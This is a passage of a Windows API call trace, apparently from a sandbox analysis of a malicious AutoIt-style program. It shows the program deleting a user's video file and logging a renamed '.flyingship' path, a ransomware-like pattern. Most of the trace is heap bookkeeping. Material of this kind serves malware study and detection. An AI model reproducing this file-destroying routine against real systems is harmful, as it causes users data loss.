(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0193.004] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0193.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.004] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.004] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.005] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0193.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.005] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.005] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.005] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFilePart=0x0) returned 0x2e [0193.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0x183ca360, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0x90af58 [0193.005] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cwkru.avi")) returned 1 [0193.007] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0x183ca360, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0 [0193.007] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.009] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.009] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.009] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.009] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0193.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0193.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0193.011] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0193.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0193.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0193.012] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x354b, lpOverlapped=0x0) returned 1 [0193.012] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0193.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x354b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0193.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\n", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0193.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8db2e8 [0193.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\n", cchWideChar=60, lpMultiByteStr=0x8db2e8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 60 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.013] WriteFile (in: hFile=0x158, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3b, lpOverlapped=0x0) returned 1 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0193.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.013] CloseHandle (hObject=0x158) returned 1 [0193.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0193.015] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0193.015] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0193.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0193.017] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0193.017] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.017] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0193.017] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0193.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0193.018] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0193.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0193.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0193.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0193.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 